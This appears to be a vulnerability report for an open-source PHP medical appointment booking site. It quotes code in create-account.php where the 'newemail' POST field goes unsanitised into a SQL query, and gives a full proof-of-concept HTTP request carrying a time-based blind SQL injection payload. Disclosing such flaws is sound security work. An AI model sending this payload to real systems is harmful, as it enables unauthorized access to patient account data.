This PHP-based open source project is a web application for booking medical appointments. Patients can use the platform to easily schedule appointments with their doctors, saving time and effort. The project's source code is open for anyone to use, modify, and distribute according to their needs.
create-account.php from line 43,The $email parameter is controllable, the parameter newemail can be passed through post, and the $email is not protected from sql injection, line 59 $result= $database->query("select * from webuser where email='$email ';"); causes sql injection
......
......
......
if($_POST){
$result= $database->query("select * from webuser");
$fname=$_SESSION['personal']['fname'];
$lname=$_SESSION['personal']['lname'];
$name=$fname." ".$lname;
$address=$_SESSION['personal']['address'];
$nic=$_SESSION['personal']['nic'];
$dob=$_SESSION['personal']['dob'];
$email=$_POST['newemail'];
$tele=$_POST['tele'];
$newpassword=$_POST['newpassword'];
$cpassword=$_POST['cpassword'];
if ($newpassword==$cpassword){
$result= $database->query("select * from webuser where email='$email';");
......
......
......
POC
POST /create-account.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
Origin: http://www.edoc.net
Connection: close
Referer: http://www.edoc.net/create-account.php
Cookie: PHPSESSID=oumjp2nqchjcrin2va1fh9n077
Upgrade-Insecure-Requests: 1
newemail=111@qq.com' AND (SELECT 5395 FROM (SELECT(SLEEP(5)))Jkvf)-- erhH&tele=0712345678&newpassword=1&cpassword=1
Vulnerability file address
create-account.php
from line 43,The $email parameter is controllable, the parameter newemail can be passed through post, and the $email is not protected from sql injection, line 59$result= $database->query("select * from webuser where email='$email ';");
causes sql injectionPOC
Attack results pictures